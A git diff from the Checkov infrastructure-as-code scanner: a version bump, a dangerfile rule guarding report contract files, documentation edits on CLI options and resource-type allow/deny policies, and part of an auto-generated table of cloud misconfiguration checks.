+        elif block_type == BlockType.LOCALS:
+            # a local block is stored as single dict
+            return [hclify(obj=blocks)]
+        else:
+            result.append({block_name: hclify(obj=config)})
+
+    return result
+
+
 def hclify(
     obj: dict[str, Any],
     conf: dict[str, Any] | None = None,
diff --git a/checkov/version.py b/checkov/version.py
index f841a9df8c9..42c6ea0b7d8 100644
--- a/checkov/version.py
+++ b/checkov/version.py
@@ -1 +1 @@
-version = '3.2.16'
+version = '3.2.214'
diff --git a/dangerfile.ts b/dangerfile.ts
index df60e71bfbe..93afea89fc5 100644
--- a/dangerfile.ts
+++ b/dangerfile.ts
@@ -1,4 +1,4 @@
-const { danger, fail, schedule } = require('danger');
+const { danger, fail, schedule, warn } = require('danger');
 
 const IGNORE_VAR = [
   'key', 's3_key', 's3_file_key', 'local_file_path', 'self.s3_bucket', 'e', 'error', 'str(e)', 'path', 'customer_name',
@@ -86,3 +86,18 @@ async function failIfLoggingLineContainsSensitiveData() {
 }
 
 schedule(failIfLoggingLineContainsSensitiveData);
+
+async function alertPublicInterfaces() {
+    let changedFiles = danger.git.modified_files || [];
+
+    for (const changedFile of changedFiles) {
+        if (changedFile.endsWith("report_types.py")) {
+            fail("You've changed `report_types.py` file, that contains the contract for checkov input and output. Make sure to stay backwards compatible.")
+        }
+        if (changedFile.endsWith("report.py") && !changedFile.includes("test")) {
+            fail("You've changed `report.py` file, that contains the contract for checkov input and output. Make sure to stay backwards compatible.")
+        }
+    }
+}
+
+schedule(alertPublicInterfaces)
diff --git a/docs/2.Basics/CLI Command Reference.md b/docs/2.Basics/CLI Command Reference.md
index 03a11036d49..728abeb48e0 100644
--- a/docs/2.Basics/CLI Command Reference.md	
+++ b/docs/2.Basics/CLI Command Reference.md	
@@ -33,11 +33,11 @@ nav_order: 2
 | `--soft-fail-on SOFT_FAIL_ON`                                                                                                                                                                                                                                                                                                                                              | Exits with a 0 exit code if only the specified items fail. Enter one or more items separated by commas. Each item may be either a Checkov check ID(CKV_AWS_123), a BC check ID (BC_AWS_GENERAL_123), or a severity (LOW, MEDIUM, HIGH, CRITICAL). If you use a severity, then any severity equal to or less than the highest severity in the list will result in a soft fail. This option may be used with `--hard-fail-on`, using the same priority logic described in `--check` and `--skip-check` options above, with `--hard-fail-on` taking precedence in a tie. If a given result does not meet the `--soft-fail-on` nor the `--hard-fail-on` criteria, then the default is to hard fail.                                                                                                                                                                                                                                                                                          |
 | `--hard-fail-on HARD_FAIL_ON`                                                                                                                                                                                                                                                                                                                                              | Exits with a non-zero exit code for specified checks. Enter one or more items separated by commas. Each item may be either a Checkov check ID (CKV_AWS_123), a BCcheck ID (BC_AWS_GENERAL_123), or a severity (LOW, MEDIUM, HIGH, CRITICAL). If you use a severity, then any severity equal to or greater than the lowest severity in the list will result in a hard fail. This option can be used with `--soft-fail-on`, using the same priority logic described in `--check` and `--skip-check` options above, with `--hard-fail-on` taking precedence in a tie.                                                                                                                                                                                                                                                                                                                                                                                                                       |
 | `--bc-api-key BC_API_KEY`                                                                                                                                                                                                                                                                                                                                                  | Prisma Cloud Access Key (see `--prisma-api-url`) [env var: BC_API_KEY]                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                   |
-| `--prisma-api-url PRISMA_API_URL`                                                                                                                                                                                                                                                                                                                                          | The Prisma Cloud API URL (see:https://prisma.pan.dev/api/cloud/api-urls). Requires `--bc-api-key` to be a Prisma Cloud Access Key in the following format: <access_key_id>::<secret_key> [env var: PRISMA_API_URL]                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                       |
+| `--prisma-api-url PRISMA_API_URL`                                                                                                                                                                                                                                                                                                                                          | The Prisma Cloud API URL (see:https://prisma.pan.dev/api/cloud/api-urls). Requires `--bc-api-key` to be a Prisma Cloud Access Key in the following format: `access_key_id::secret_key` [env var: PRISMA_API_URL]                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                       |
 | `--skip-results-upload`                                                                                                                                                                                                                                                                                                                                                    | Do not upload scan results to the platform. Use this to download configs, but only view results in the local output.                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                     |
 | `--image, --docker-image DOCKER_IMAGE`                                                                                                                                                                                                                                                                                                                                     | Scan docker images by name or ID. Only works with `--bc-api-key flag`                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    |
 | `--dockerfile-path DOCKERFILE_PATH`                                                                                                                                                                                                                                                                                                                                        | Path to the Dockerfile of the scanned docker image                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                       |
-| `--repo-id REPO_ID`                                                                                                                                                                                                                                                                                                                                                        | Identity string of the repository, with form <repo_owner>/<repo_name>                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    |
+| `--repo-id REPO_ID`                                                                                                                                                                                                                                                                                                                                                        | Identity string of the repository, with form `repo_owner/repo_name`                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    |
 | `-b, --branch BRANCH`                                                                                                                                                                                                                                                                                                                                                      | Selected branch of the persisted repository. Only has effect when using the `--bc-api-key` flag                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          |
 | `--skip-download`                                                                                                                                                                                                                                                                                                                                                          | Do not download any data from Prisma Cloud. This will omit doc links, severities, etc., as well as custom policies and suppressions if using an API token. Note: it will prevent BC platform IDs from being available in Checkov.                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        |
 | `--use-enforcement-rules`                                                                                                                                                                                                                                                                                                                                                  | Use the Enforcement rules configured in the platform for hard/soft fail logic, where the matching enforcement rule (or the default rule if no match) determines the behavior: skip checks below soft-fail threshold, include checks equal to or above hard-fail threshold in hard-fail list, and include checks in between in soft-fail list. Overrides can be applied using `--check`, `--skip-check`, `--soft-fail`, `--soft-fail-on`, or `--hard-fail-on`, but the order of applying `--check` and `--skip-check` (as described under `--check`) still applies here. Requires BC or PC platform API key.                                                                                                                                                                                                                                                                                                                                                                              |
@@ -55,10 +55,11 @@ nav_order: 2
 | `--output-baseline-as-skipped`                                                                                                                                                                                                                                                                                                                                             | Output checks that are skipped due to baseline file presence                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                             |
 | `--skip-cve-package SKIP_CVE_PACKAGE`                                                                                                                                                                                                                                                                                                                                      | Filter scan to run on all packages but a specific package identifier (deny list), You can specify this argument multiple times to skip multiple packages                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                 |
 | `--policy-metadata-filter POLICY_METADATA_FILTER`                                                                                                                                                                                                                                                                                                                          | Comma separated key:value string to filter policies based on Prisma Cloud policy metadata. See https://prisma.pan.dev/api/cloud/cspm/policy#operation/get-policy-filters-and-options for information on allowed filters. Format: policy.label=test,cloud.type=aws                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        |
-| `--summary-position` {`top`, `bottom`}                                                                                                                                                                                                                                                                                                                                     | Chose whether the summary will be appended on top (before the checks results) or on bottom (after check results), default is on top.                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                     |
+| `--summary-position` {`top`, `bottom`}                                                                                                                                                                                                                                                                                                                                     | Choose whether the summary will be appended on top (before the checks results) or on bottom (after check results), default is on top.                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                     |
 | `--no-fail-on-crash                            `                                                                                                                                                                                                                                                                                                                           | Return exit code 0 instead of 2 which indicates a failure in the integration with the platform                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                           |
 | `--enable-secret-scan-all-files CKV_SECRETS_SCAN_ENABLE_ALL`                                                                                                                                                                                                                                                                                                               | Enable secret scan to scan all type of file                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              |
 | `--scan-secrets-history`                                                                                                                                                                                                                                                                                                                                                   | Enable secret scan history of commits                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    |
 | `--block-list-secret-scan CKV_SECRETS_SCAN_BLOCK_LIST`                                                                                                                                                                                                                                                                                                                     | List of files to filter out in the secret scanner                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        |
 | `--support`                                                                                                                                                                                                                                                                                                                                                                | Enable debug logs and upload the logs to the server. Requires a Prisma Cloud API key.                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    |
 | `--openai-api-key`                                                                                                                                                                                                                                                                                                                                                         | Add an OpenAI API key to enhance finding guidelines by sending violated policies and resource code to OpenAI to request remediation guidance. This will use your OpenAI credits. Set your number of findings that will receive enhanced guidelines using CKV_OPENAI_MAX_FINDINGS                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                         |
+| env variable: `RENDER_EDGES_DUPLICATE_ITER_COUNT`                                                                                                                                                                                                                                                                                                                                 | Set the threshold to break out of calculating duplicate edges in the graph. This can be determined if you see `Reached too many edge duplications...` in the Checkov logs. Default: `4`.                                                                                                                                                                                                                                                |
diff --git a/docs/3.Custom Policies/Examples.md b/docs/3.Custom Policies/Examples.md
index 342d0ffc04e..b479663e2d4 100644
--- a/docs/3.Custom Policies/Examples.md	
+++ b/docs/3.Custom Policies/Examples.md	
@@ -479,3 +479,16 @@ definition:
     - prod
     - prod-eu
 ```
+
+## Creating an allow list of resource types
+
+The following policy only allows resources of type `aws_instance` and `aws_db_instance` to be provisioned. 
+
+```yaml
+definition:
+  cond_type: "resource"
+  resource_types:
+    - "aws_instance"
+    - "aws_db_instance"
+  operator: "exists"
+```
diff --git a/docs/3.Custom Policies/Sharing Custom Policies.md b/docs/3.Custom Policies/Sharing Custom Policies.md
index cd4bf39599e..ef81b92ffa0 100644
--- a/docs/3.Custom Policies/Sharing Custom Policies.md	
+++ b/docs/3.Custom Policies/Sharing Custom Policies.md	
@@ -26,3 +26,5 @@ checkov --external-checks-git  https://github.com/bridgecrewio/checkov.git//test
 For example, if you’re downloading this GitHub repository, but you only want to download the “extra_checks” directory, you can do the following:
 
 `https://github.com/bridgecrewio/checkov.git//extra_checks`
+
+Note: Checkov will execute Python code. Only use trusted sources when executing external checks.
diff --git a/docs/3.Custom Policies/YAML Custom Policies.md b/docs/3.Custom Policies/YAML Custom Policies.md
index e774c60e02f..3652f89765d 100644
--- a/docs/3.Custom Policies/YAML Custom Policies.md	
+++ b/docs/3.Custom Policies/YAML Custom Policies.md	
@@ -58,7 +58,8 @@ The top level object under `definition` must be a single object (not a list). It
 ## Types of Definition Blocks
 
 * **Attribute Blocks:** The policy describes resources with a certain configuration as defined by a configuration **attribute** and its value (per Terraform), or by the presence/absence of an attribute.
-* **Connection State Blocks** - The policy describes resources in a particular **Connection state**; either connected or not connected to another type of resource (for example, a security group).
+* **Connection State Blocks:**  The policy describes resources in a particular **Connection state**; either connected or not connected to another type of resource (for example, a security group).
+* **Resource Type Blocks:** The policy describes resource types that are either allowed or forbidden to use, commonly referred to as allow/deny lists.
 
 ### Using AND/OR Logic
 A policy definition may include multiple blocks (**Attribute**, **Connection state** or both), associated by **AND/OR** logic.
@@ -253,6 +254,22 @@ definition:
 
 *Note: The condition above uses AND logic. See [additional examples](https://www.checkov.io/3.Custom%20Policies/Examples.html) for complex logic in policy definitions.*
 
+## Resource Type Blocks
+
+A **Resource Type Block** in a policy's definition indicates that a resource will be compliant/non-complaint depending on the resource type, which is allowed/forbidden. Use the `exist` operator to define an allowlist and the `not_exist` operator to define a blocklist.
+
+### Resource Type Block Example
+
+The Resource Type Block in the `definition` in the example below is used to ensure CloudHSM cluster won't be provisioned:
+
+```yaml
+definition:
+  cond_type: "resource"
+  resource_types:
+   - "aws_cloudhsm_v2_cluster"
+  operator: "not_exists"
+```
+
 ## Using AND/OR Logic
 
 The Prisma Cloud platform allows you to combine definition blocks using AND/OR operators.
diff --git a/docs/4.Integrations/pre-commit.md b/docs/4.Integrations/pre-commit.md
index 69a22c9f374..82d06926b0e 100644
--- a/docs/4.Integrations/pre-commit.md
+++ b/docs/4.Integrations/pre-commit.md
@@ -1,15 +1,16 @@
 ---
 layout: default
 published: true
-title: Pre-Commit
+title: Pre-Commit Hooks
 nav_order: 6
 ---
 
-# Pre-Commit
+# Pre-Commit Hooks
 
-If you want to automatically run `checkov` when files in your git repo change, [install the pre-commit binary](https://pre-commit.com/#install), and add a [.pre-commit-config.yaml file](./.pre-commit-config.yaml) to your project with content similar to the example below.
+To automatically run Checkov whenever files in your Git repository change, first [install the pre-commit binary](https://pre-commit.com/#install) and then add a [.pre-commit-config.yaml](https://github.com/bridgecrewio/checkov/blob/main/.pre-commit-config.yaml) file to your project with content similar to the example below.
 
-Note that depending on the hook id you select for pre-commit hooks, you may need to provide the following:
+
+NOTE: Depending on the hook id you select for pre-commit hooks, you may need to provide the following:
 
 * For the `python` hooks, pre-commit 3.x is able to provide [python](https://pre-commit.com/#python) without additional dependencies.
 * For the `container` hooks, the [Docker](https://docs.docker.com/get-docker/) CLI and a container runtime must be available.
diff --git a/docs/5.Policy Index/all.md b/docs/5.Policy Index/all.md
index 90d1d609ecc..5bd974a6fb7 100644
--- a/docs/5.Policy Index/all.md	
+++ b/docs/5.Policy Index/all.md	
@@ -6,3703 +6,3970 @@ nav_order: 1
 
 # all resource scans (auto generated)
 
-|      | Id                       | Type                             | Entity                                                                                           | Policy                                                                                                                                                                                                   | IaC                     | Resource Link                                                                                                                                                                                                            |
-|------|--------------------------|----------------------------------|--------------------------------------------------------------------------------------------------|----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|-------------------------|--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|
-|    0 | CKV2_ADO_1               | resource                         | azuredevops_branch_policy_min_reviewers                                                          | Ensure at least two approving reviews for PRs                                                                                                                                                            | Terraform               | [ADORepositoryHasMinTwoReviewers.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azuredevops/ADORepositoryHasMinTwoReviewers.yaml)                                         |
-|    1 | CKV2_ADO_1               | resource                         | azuredevops_git_repository                                                                       | Ensure at least two approving reviews for PRs                                                                                                                                                            | Terraform               | [ADORepositoryHasMinTwoReviewers.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azuredevops/ADORepositoryHasMinTwoReviewers.yaml)                                         |
-|    2 | CKV_ALI_1                | resource                         | alicloud_oss_bucket                                                                              | Alibaba Cloud OSS bucket accessible to public                                                                                                                                                            | Terraform               | [OSSBucketPublic.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/OSSBucketPublic.py)                                                                                    |
-|    3 | CKV_ALI_2                | resource                         | alicloud_security_group_rule                                                                     | Ensure no security groups allow ingress from 0.0.0.0:0 to port 22                                                                                                                                        | Terraform               | [SecurityGroupUnrestrictedIngress22.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/SecurityGroupUnrestrictedIngress22.py)                                              |
-|    4 | CKV_ALI_3                | resource                         | alicloud_security_group_rule                                                                     | Ensure no security groups allow ingress from 0.0.0.0:0 to port 3389                                                                                                                                      | Terraform               | [SecurityGroupUnrestrictedIngress3389.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/SecurityGroupUnrestrictedIngress3389.py)                                          |
-|    5 | CKV_ALI_4                | resource                         | alicloud_actiontrail_trail                                                                       | Ensure Action Trail Logging for all regions                                                                                                                                                              | Terraform               | [ActionTrailLogAllRegions.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/ActionTrailLogAllRegions.py)                                                                  |
-|    6 | CKV_ALI_5                | resource                         | alicloud_actiontrail_trail                                                                       | Ensure Action Trail Logging for all events                                                                                                                                                               | Terraform               | [ActionTrailLogAllEvents.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/ActionTrailLogAllEvents.py)                                                                    |
-|    7 | CKV_ALI_6                | resource                         | alicloud_oss_bucket                                                                              | Ensure OSS bucket is encrypted with Customer Master Key                                                                                                                                                  | Terraform               | [OSSBucketEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/OSSBucketEncryptedWithCMK.py)                                                                |
-|    8 | CKV_ALI_7                | resource                         | alicloud_disk                                                                                    | Ensure disk is encrypted                                                                                                                                                                                 | Terraform               | [DiskIsEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/DiskIsEncrypted.py)                                                                                    |
-|    9 | CKV_ALI_8                | resource                         | alicloud_disk                                                                                    | Ensure Disk is encrypted with Customer Master Key                                                                                                                                                        | Terraform               | [DiskEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/DiskEncryptedWithCMK.py)                                                                          |
-|   10 | CKV_ALI_9                | resource                         | alicloud_db_instance                                                                             | Ensure database instance is not public                                                                                                                                                                   | Terraform               | [RDSIsPublic.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/RDSIsPublic.py)                                                                                            |
-|   11 | CKV_ALI_10               | resource                         | alicloud_oss_bucket                                                                              | Ensure OSS bucket has versioning enabled                                                                                                                                                                 | Terraform               | [OSSBucketVersioning.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/OSSBucketVersioning.py)                                                                            |
-|   12 | CKV_ALI_11               | resource                         | alicloud_oss_bucket                                                                              | Ensure OSS bucket has transfer Acceleration enabled                                                                                                                                                      | Terraform               | [OSSBucketTransferAcceleration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/OSSBucketTransferAcceleration.py)                                                        |
-|   13 | CKV_ALI_12               | resource                         | alicloud_oss_bucket                                                                              | Ensure the OSS bucket has access logging enabled                                                                                                                                                         | Terraform               | [OSSBucketAccessLogs.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/OSSBucketAccessLogs.py)                                                                            |
-|   14 | CKV_ALI_13               | resource                         | alicloud_ram_account_password_policy                                                             | Ensure RAM password policy requires minimum length of 14 or greater                                                                                                                                      | Terraform               | [RAMPasswordPolicyLength.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/RAMPasswordPolicyLength.py)                                                                    |
-|   15 | CKV_ALI_14               | resource                         | alicloud_ram_account_password_policy                                                             | Ensure RAM password policy requires at least one number                                                                                                                                                  | Terraform               | [RAMPasswordPolicyNumber.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/RAMPasswordPolicyNumber.py)                                                                    |
-|   16 | CKV_ALI_15               | resource                         | alicloud_ram_account_password_policy                                                             | Ensure RAM password policy requires at least one symbol                                                                                                                                                  | Terraform               | [RAMPasswordPolicySymbol.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/RAMPasswordPolicySymbol.py)                                                                    |
-|   17 | CKV_ALI_16               | resource                         | alicloud_ram_account_password_policy                                                             | Ensure RAM password policy expires passwords within 90 days or less                                                                                                                                      | Terraform               | [RAMPasswordPolicyExpiration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/RAMPasswordPolicyExpiration.py)                                                            |
-|   18 | CKV_ALI_17               | resource                         | alicloud_ram_account_password_policy                                                             | Ensure RAM password policy requires at least one lowercase letter                                                                                                                                        | Terraform               | [RAMPasswordPolicyLowercaseLetter.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/RAMPasswordPolicyLowercaseLetter.py)                                                  |
-|   19 | CKV_ALI_18               | resource                         | alicloud_ram_account_password_policy                                                             | Ensure RAM password policy prevents password reuse                                                                                                                                                       | Terraform               | [RAMPasswordPolicyReuse.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/RAMPasswordPolicyReuse.py)                                                                      |
-|   20 | CKV_ALI_19               | resource                         | alicloud_ram_account_password_policy                                                             | Ensure RAM password policy requires at least one uppercase letter                                                                                                                                        | Terraform               | [RAMPasswordPolicyUppcaseLetter.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/RAMPasswordPolicyUppcaseLetter.py)                                                      |
-|   21 | CKV_ALI_20               | resource                         | alicloud_db_instance                                                                             | Ensure RDS instance uses SSL                                                                                                                                                                             | Terraform               | [RDSInstanceSSL.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/RDSInstanceSSL.py)                                                                                      |
-|   22 | CKV_ALI_21               | resource                         | alicloud_api_gateway_api                                                                         | Ensure API Gateway API Protocol HTTPS                                                                                                                                                                    | Terraform               | [APIGatewayProtocolHTTPS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/APIGatewayProtocolHTTPS.py)                                                                    |
-|   23 | CKV_ALI_22               | resource                         | alicloud_db_instance                                                                             | Ensure Transparent Data Encryption is Enabled on instance                                                                                                                                                | Terraform               | [RDSTransparentDataEncryptionEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/RDSTransparentDataEncryptionEnabled.py)                                            |
-|   24 | CKV_ALI_23               | resource                         | alicloud_ram_account_password_policy                                                             | Ensure Ram Account Password Policy Max Login Attempts not > 5                                                                                                                                            | Terraform               | [RAMPasswordPolicyMaxLogin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/RAMPasswordPolicyMaxLogin.py)                                                                |
-|   25 | CKV_ALI_24               | resource                         | alicloud_ram_security_preference                                                                 | Ensure RAM enforces MFA                                                                                                                                                                                  | Terraform               | [RAMSecurityEnforceMFA.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/RAMSecurityEnforceMFA.py)                                                                        |
-|   26 | CKV_ALI_25               | resource                         | alicloud_db_instance                                                                             | Ensure RDS Instance SQL Collector Retention Period should be greater than 180                                                                                                                            | Terraform               | [RDSRetention.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/RDSRetention.py)                                                                                          |
-|   27 | CKV_ALI_26               | resource                         | alicloud_cs_kubernetes                                                                           | Ensure Kubernetes installs plugin Terway or Flannel to support standard policies                                                                                                                         | Terraform               | [K8sEnableNetworkPolicies.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/K8sEnableNetworkPolicies.py)                                                                  |
-|   28 | CKV_ALI_27               | resource                         | alicloud_kms_key                                                                                 | Ensure KMS Key Rotation is enabled                                                                                                                                                                       | Terraform               | [KMSKeyRotationIsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/KMSKeyRotationIsEnabled.py)                                                                    |
-|   29 | CKV_ALI_28               | resource                         | alicloud_kms_key                                                                                 | Ensure KMS Keys are enabled                                                                                                                                                                              | Terraform               | [KMSKeyIsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/KMSKeyIsEnabled.py)                                                                                    |
-|   30 | CKV_ALI_29               | resource                         | alicloud_alb_acl_entry_attachment                                                                | Alibaba ALB ACL does not restrict Access                                                                                                                                                                 | Terraform               | [ALBACLIsUnrestricted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/ALBACLIsUnrestricted.py)                                                                          |
-|   31 | CKV_ALI_30               | resource                         | alicloud_db_instance                                                                             | Ensure RDS instance auto upgrades for minor versions                                                                                                                                                     | Terraform               | [RDSInstanceAutoUpgrade.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/RDSInstanceAutoUpgrade.py)                                                                      |
-|   32 | CKV_ALI_31               | resource                         | alicloud_cs_kubernetes_node_pool                                                                 | Ensure K8s nodepools are set to auto repair                                                                                                                                                              | Terraform               | [K8sNodePoolAutoRepair.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/K8sNodePoolAutoRepair.py)                                                                        |
-|   33 | CKV_ALI_32               | resource                         | alicloud_ecs_launch_template                                                                     | Ensure launch template data disks are encrypted                                                                                                                                                          | Terraform               | [LaunchTemplateDisksAreEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/LaunchTemplateDisksAreEncrypted.py)                                                    |
-|   34 | CKV_ALI_33               | resource                         | alicloud_slb_tls_cipher_policy                                                                   | Alibaba Cloud Cypher Policy are secure                                                                                                                                                                   | Terraform               | [TLSPoliciesAreSecure.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/TLSPoliciesAreSecure.py)                                                                          |
-|   35 | CKV_ALI_35               | resource                         | alicloud_db_instance                                                                             | Ensure RDS instance has log_duration enabled                                                                                                                                                             | Terraform               | [RDSInstanceLogsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/RDSInstanceLogsEnabled.py)                                                                      |
-|   36 | CKV_ALI_36               | resource                         | alicloud_db_instance                                                                             | Ensure RDS instance has log_disconnections enabled                                                                                                                                                       | Terraform               | [RDSInstanceLogDisconnections.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/RDSInstanceLogDisconnections.py)                                                          |
-|   37 | CKV_ALI_37               | resource                         | alicloud_db_instance                                                                             | Ensure RDS instance has log_connections enabled                                                                                                                                                          | Terraform               | [RDSInstanceLogConnections.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/RDSInstanceLogConnections.py)                                                                |
-|   38 | CKV_ALI_38               | resource                         | alicloud_log_audit                                                                               | Ensure log audit is enabled for RDS                                                                                                                                                                      | Terraform               | [LogAuditRDSEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/LogAuditRDSEnabled.py)                                                                              |
-|   39 | CKV_ALI_41               | resource                         | alicloud_mongodb_instance                                                                        | Ensure MongoDB is deployed inside a VPC                                                                                                                                                                  | Terraform               | [MongoDBInsideVPC.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/MongoDBInsideVPC.py)                                                                                  |
-|   40 | CKV_ALI_42               | resource                         | alicloud_mongodb_instance                                                                        | Ensure Mongodb instance uses SSL                                                                                                                                                                         | Terraform               | [MongoDBInstanceSSL.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/MongoDBInstanceSSL.py)                                                                              |
-|   41 | CKV_ALI_43               | resource                         | alicloud_mongodb_instance                                                                        | Ensure MongoDB instance is not public                                                                                                                                                                    | Terraform               | [MongoDBIsPublic.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/MongoDBIsPublic.py)                                                                                    |
-|   42 | CKV_ALI_44               | resource                         | alicloud_mongodb_instance                                                                        | Ensure MongoDB has Transparent Data Encryption Enabled                                                                                                                                                   | Terraform               | [MongoDBTransparentDataEncryptionEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/MongoDBTransparentDataEncryptionEnabled.py)                                    |
-|   43 | CKV_ANSIBLE_1            | resource                         | [?"ansible.builtin.uri" != null][]                                                               | Ensure that certificate validation isn't disabled with uri                                                                                                                                               | Ansible                 | [UriValidateCerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/UriValidateCerts.py)                                                                                         |
-|   44 | CKV_ANSIBLE_1            | resource                         | [?"uri" != null][]                                                                               | Ensure that certificate validation isn't disabled with uri                                                                                                                                               | Ansible                 | [UriValidateCerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/UriValidateCerts.py)                                                                                         |
-|   45 | CKV_ANSIBLE_1            | resource                         | [].block[?"ansible.builtin.uri" != null][]                                                       | Ensure that certificate validation isn't disabled with uri                                                                                                                                               | Ansible                 | [UriValidateCerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/UriValidateCerts.py)                                                                                         |
-|   46 | CKV_ANSIBLE_1            | resource                         | [].block[?"uri" != null][]                                                                       | Ensure that certificate validation isn't disabled with uri                                                                                                                                               | Ansible                 | [UriValidateCerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/UriValidateCerts.py)                                                                                         |
-|   47 | CKV_ANSIBLE_1            | resource                         | [].block[].block[?"ansible.builtin.uri" != null][]                                               | Ensure that certificate validation isn't disabled with uri                                                                                                                                               | Ansible                 | [UriValidateCerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/UriValidateCerts.py)                                                                                         |
-|   48 | CKV_ANSIBLE_1            | resource                         | [].block[].block[?"uri" != null][]                                                               | Ensure that certificate validation isn't disabled with uri                                                                                                                                               | Ansible                 | [UriValidateCerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/UriValidateCerts.py)                                                                                         |
